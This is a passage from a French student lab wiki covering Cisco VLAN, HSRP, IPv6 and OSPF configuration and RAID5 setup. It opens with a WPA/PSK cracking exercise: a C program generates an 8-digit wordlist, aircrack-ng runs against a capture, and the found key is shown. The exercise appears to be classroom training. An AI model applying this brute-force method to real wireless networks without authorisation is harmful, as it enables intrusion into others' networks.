 #mv /home/pifou/Mon_FICHIER /media/MA_CLE_USB             //répéter autant que nécessaire&lt;br /&gt;
 #umount /media/MA_CLE_USB&lt;br /&gt;
&lt;br /&gt;
=====Crack WPA/PSK=====&lt;br /&gt;
&lt;br /&gt;
On crée un petit programme &amp;lt;code&amp;gt;main.c&amp;lt;/code&amp;gt; pour lister tous les codes possibles, on sait qu'il s'agit d'un code de 8 chiffres&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     int i;&lt;br /&gt;
     // key is 8 numeric digits&lt;br /&gt;
     for(i=0;i&amp;lt;99999999;i++){&lt;br /&gt;
         printf(&amp;quot;%d\n&amp;quot;,i);&lt;br /&gt;
     }&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
On compile et on stock dans un txt&lt;br /&gt;
&lt;br /&gt;
 #gcc main.c -o main -Wall&lt;br /&gt;
 #./main &amp;gt; dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
On peut à présent lancer le crack&lt;br /&gt;
&lt;br /&gt;
 #aircrack-ng FILENAME.cap -w dictionnaire.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:crack-cracotte02.png]]&lt;br /&gt;
&lt;br /&gt;
Après un certains temps d'execution, on obtient la clé&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Found_key.png]]&lt;br /&gt;
&lt;br /&gt;
Clé : 42429902&lt;br /&gt;
===Séance 4 : 17/12/2018===&lt;br /&gt;
====Correction IPV6 routeur====&lt;br /&gt;
&lt;br /&gt;
===== Vlan 43 - XEN =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan43&lt;br /&gt;
 int vlan43&lt;br /&gt;
 ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 22 ip 193.48.57.190&lt;br /&gt;
 standby 22 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 131 - Interconnexion =====&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan 131&lt;br /&gt;
 int vlan 131&lt;br /&gt;
 ip address 192.168.222.9 255.255.255.248         &lt;br /&gt;
 ipv6 address fe80::2 link-local                  &lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 rip tpima2a5 enable                        &lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vlan 10+N - Groupe N =====&lt;br /&gt;
&lt;br /&gt;
'''IPv4'''&lt;br /&gt;
&lt;br /&gt;
* Notre Routeur : &amp;lt;code&amp;gt;10.60.10+N.252&amp;lt;/code&amp;gt;&lt;br /&gt;
* Routeur Virtuel : &amp;lt;code&amp;gt;10.60.10+N.254&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''IPv6'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;code&amp;gt;2001:660:4401:60XX&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* VLAN 11 à 21 : &amp;lt;code&amp;gt;C1&amp;lt;/code&amp;gt; à &amp;lt;code&amp;gt;CB&amp;lt;/code&amp;gt;&lt;br /&gt;
* VLAN 43 : &amp;lt;code&amp;gt;C0&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Groupe 1&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan11&lt;br /&gt;
 int vlan11&lt;br /&gt;
 ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 11 ip 10.60.11.254&lt;br /&gt;
 standby 11 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 11&lt;br /&gt;
 name groupe1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 2&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan12&lt;br /&gt;
 int vlan12&lt;br /&gt;
 ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 12 ip 10.60.12.254&lt;br /&gt;
 standby 12 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 12&lt;br /&gt;
 name groupe2&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 3&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan13&lt;br /&gt;
 int vlan13&lt;br /&gt;
 ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 13 ip 10.60.13.254&lt;br /&gt;
 standby 13 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 13&lt;br /&gt;
 name groupe3&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 4&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan14&lt;br /&gt;
 int vlan14&lt;br /&gt;
 ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 14 ip 10.60.14.254&lt;br /&gt;
 standby 14 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 14&lt;br /&gt;
 name groupe4&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 5&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan15&lt;br /&gt;
 int vlan15&lt;br /&gt;
 ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 15 ip 10.60.15.254&lt;br /&gt;
 standby 15 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 15&lt;br /&gt;
 name groupe5&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 6&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan16&lt;br /&gt;
 int vlan16&lt;br /&gt;
 ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 16 ip 10.60.16.254&lt;br /&gt;
 standby 16 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 16&lt;br /&gt;
 name groupe6&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 7&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan17&lt;br /&gt;
 int vlan17&lt;br /&gt;
 ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 17 ip 10.60.17.254&lt;br /&gt;
 standby 17 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 17&lt;br /&gt;
 name groupe7&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 8&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan18&lt;br /&gt;
 int vlan18&lt;br /&gt;
 ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 18 ip 10.60.18.254&lt;br /&gt;
 standby 18 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 18&lt;br /&gt;
 name groupe8&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 9&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan19&lt;br /&gt;
 int vlan19&lt;br /&gt;
 ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 19 ip 10.60.19.254&lt;br /&gt;
 standby 19 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 19&lt;br /&gt;
 name groupe9&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 10&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan20&lt;br /&gt;
 int vlan20&lt;br /&gt;
 ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 20 ip 10.60.20.254&lt;br /&gt;
 standby 20 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 20&lt;br /&gt;
 name groupe10&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
* Groupe 11&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
 no int vlan21&lt;br /&gt;
 int vlan21&lt;br /&gt;
 ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
 standby version 2&lt;br /&gt;
 standby 21 ip 10.60.21.254&lt;br /&gt;
 standby 21 preempt&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 21&lt;br /&gt;
 name groupe11&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
===== Vérifications du fonctionnement =====&lt;br /&gt;
&lt;br /&gt;
====== show running-config ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show run &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 spanning-tree mode pvst&lt;br /&gt;
 spanning-tree loopguard default&lt;br /&gt;
 spanning-tree etherchannel guard misconfig&lt;br /&gt;
 spanning-tree extend system-id&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface GigabitEthernet0/1&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/2&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/3&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/4&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/5&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/6&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/7&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !         &lt;br /&gt;
 interface GigabitEthernet0/8&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/9&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/10&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
  channel-group 1 mode active&lt;br /&gt;
 !&lt;br /&gt;
 interface GigabitEthernet0/11&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode trunk&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 interface TenGigabitEthernet0/1&lt;br /&gt;
  switchport access vlan 131&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface TenGigabitEthernet0/2&lt;br /&gt;
  switchport access vlan 43&lt;br /&gt;
  switchport trunk encapsulation dot1q&lt;br /&gt;
  switchport mode access&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan1&lt;br /&gt;
  ip address 10.60.1.252 255.255.255.0&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan11&lt;br /&gt;
  ip address 10.60.11.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C1::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C1::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 11 ip 10.60.11.254&lt;br /&gt;
  standby 11 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan12&lt;br /&gt;
  ip address 10.60.12.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C2::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C2::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 12 ip 10.60.12.254&lt;br /&gt;
  standby 12 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan13&lt;br /&gt;
  ip address 10.60.13.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C3::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C3::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 13 ip 10.60.13.254&lt;br /&gt;
  standby 13 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan14&lt;br /&gt;
  ip address 10.60.14.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C4::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C4::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 14 ip 10.60.14.254&lt;br /&gt;
  standby 14 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan15&lt;br /&gt;
  ip address 10.60.15.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C5::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C5::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 15 ip 10.60.15.254&lt;br /&gt;
  standby 15 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan16&lt;br /&gt;
  ip address 10.60.16.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C6::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C6::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 16 ip 10.60.16.254&lt;br /&gt;
  standby 16 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan17&lt;br /&gt;
  ip address 10.60.17.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C7::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C7::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 17 ip 10.60.17.254&lt;br /&gt;
  standby 17 preempt&lt;br /&gt;
 !         &lt;br /&gt;
 interface Vlan18&lt;br /&gt;
  ip address 10.60.18.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C8::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C8::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 18 ip 10.60.18.254&lt;br /&gt;
  standby 18 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan19&lt;br /&gt;
  ip address 10.60.19.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60C9::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C9::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 19 ip 10.60.19.254&lt;br /&gt;
  standby 19 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan20&lt;br /&gt;
  ip address 10.60.20.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CA::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CA::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 20 ip 10.60.20.254&lt;br /&gt;
  standby 20 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan21&lt;br /&gt;
  ip address 10.60.21.252 255.255.255.0&lt;br /&gt;
  ipv6 address prefix 2001:660:4401:60CB::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60CB::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 21 ip 10.60.21.254&lt;br /&gt;
  standby 21 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan43&lt;br /&gt;
  ip address 193.48.57.188 255.255.255.240&lt;br /&gt;
  ipv6 address 2001:660:4401:60C0::/64 eui-64&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 nd prefix 2001:660:4401:60C0::/64 1000 900&lt;br /&gt;
  ipv6 nd router-preference High&lt;br /&gt;
  standby version 2&lt;br /&gt;
  standby 22 ip 193.48.57.190&lt;br /&gt;
  standby 22 preempt&lt;br /&gt;
 !&lt;br /&gt;
 interface Vlan131&lt;br /&gt;
  ip address 192.168.222.9 255.255.255.248&lt;br /&gt;
  ipv6 address FE80::2 link-local&lt;br /&gt;
  ipv6 enable&lt;br /&gt;
  ipv6 rip tpima2a5 enable&lt;br /&gt;
 !&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  router-id 10.60.11.252&lt;br /&gt;
  log-adjacency-changes&lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
  summary-address 192.168.0.0 255.255.255.0 not-advertise&lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise&lt;br /&gt;
  redistribute connected subnets&lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 ipv6 router rip tpima5sc&lt;br /&gt;
  redistribute connected metric 1&lt;br /&gt;
  redistribute static metric 1&lt;br /&gt;
 !&lt;br /&gt;
 [...]&lt;br /&gt;
 end&lt;br /&gt;
&lt;br /&gt;
====== Show Interface status ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show int status &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Port      Name               Status       Vlan       Duplex  Speed Type&lt;br /&gt;
 Gi0/1                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/2                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/3                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/4                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/5                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/6                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/7                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/8                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/9                        connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 Gi0/10                       connected    trunk      a-full  a-100 10/100/1000BaseTX            // Vers C1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/11                       connected    trunk      a-full a-1000 10/100/1000BaseTX            // Vers C2&lt;br /&gt;
 &lt;br /&gt;
 Gi0/12                       notconnect   1            auto   auto 10/100/1000BaseTX            // Borne Wi-Fi du groupe 1&lt;br /&gt;
 &lt;br /&gt;
 Gi0/13                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/14                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 [...]                        //           //           //     //   //&lt;br /&gt;
 Gi0/47                       notconnect   1            auto   auto 10/100/1000BaseTX            &lt;br /&gt;
 Gi0/48                       notconnect   1            auto   auto 10/100/1000BaseTX  &lt;br /&gt;
           &lt;br /&gt;
 Te0/1                        connected    131          full    10G 10GBase-SR                   // Vers SR52&lt;br /&gt;
 Te0/2                        connected    43           full    10G 10GBase-SR                   // Vers Cordouan&lt;br /&gt;
&lt;br /&gt;
====== IPv6 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ipv6 route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Switch#show ipv6 route&lt;br /&gt;
 IPv6 Routing Table - Default - 53 entries&lt;br /&gt;
 Codes: C - Connected, L - Local, S - Static, U - Per-user Static route&lt;br /&gt;
        B - BGP, R - RIP, D - EIGRP, EX - EIGRP external&lt;br /&gt;
        O - OSPF Intra, OI - OSPF Inter, OE1 - OSPF ext 1, OE2 - OSPF ext 2&lt;br /&gt;
        ON1 - OSPF NSSA ext 1, ON2 - OSPF NSSA ext 2&lt;br /&gt;
 R   ::/0 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:60::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6000::/56 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6002::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6003::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6004::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6005::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6006::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6007::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6008::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6009::/64 [120/2]&lt;br /&gt;
      via FE80::42:1, Vlan131&lt;br /&gt;
 R   2001:660:4401:6011::/64 [120/2]&lt;br /&gt;
&lt;br /&gt;
====== IPv4 ======&lt;br /&gt;
&lt;br /&gt;
* &amp;lt;code&amp;gt; show ip route &amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons bien de l'OSPF ('''O''') et OSPF NSSA external type 2 ('''E2''')&lt;br /&gt;
&lt;br /&gt;
 Switch#sh ip route&lt;br /&gt;
 Codes: C - connected, S - static, R - RIP, M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, O - OSPF, IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
      193.51.182.0/30 is subnetted, 1 subnets&lt;br /&gt;
 O E2    193.51.182.108 [110/20] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.12.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.29.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O E2 192.168.28.0/24 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
      193.48.63.0/24 is variably subnetted, 2 subnets, 2 masks&lt;br /&gt;
 O E2    193.48.63.0/26 [110/10] via 192.168.222.14, 00:29:30, Vlan131&lt;br /&gt;
 O IA    193.48.63.1/32 [110/13] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O IA 193.49.225.0/24 [110/3] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
      192.168.44.0/29 is subnetted, 4 subnets&lt;br /&gt;
 O E2    192.168.44.0 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.8 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
 O E2    192.168.44.32 [110/10] via 192.168.222.14, 00:29:31, Vlan131&lt;br /&gt;
&lt;br /&gt;
====Sécurisation des données via RAID5====&lt;br /&gt;
=====Les partitions=====&lt;br /&gt;
&lt;br /&gt;
Création des trois partitions 1G,&lt;br /&gt;
&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part1 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part2 virtual&lt;br /&gt;
  lvcreate -L1G -n IMA5_Dionysos_part3 virtual&lt;br /&gt;
&lt;br /&gt;
Ajout de ces partitions lors de la création de la VM, dans le fichier Dionysos.cfg:&lt;br /&gt;
  &lt;br /&gt;
  disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Dionysos/disk.img,xvda2,w',&lt;br /&gt;
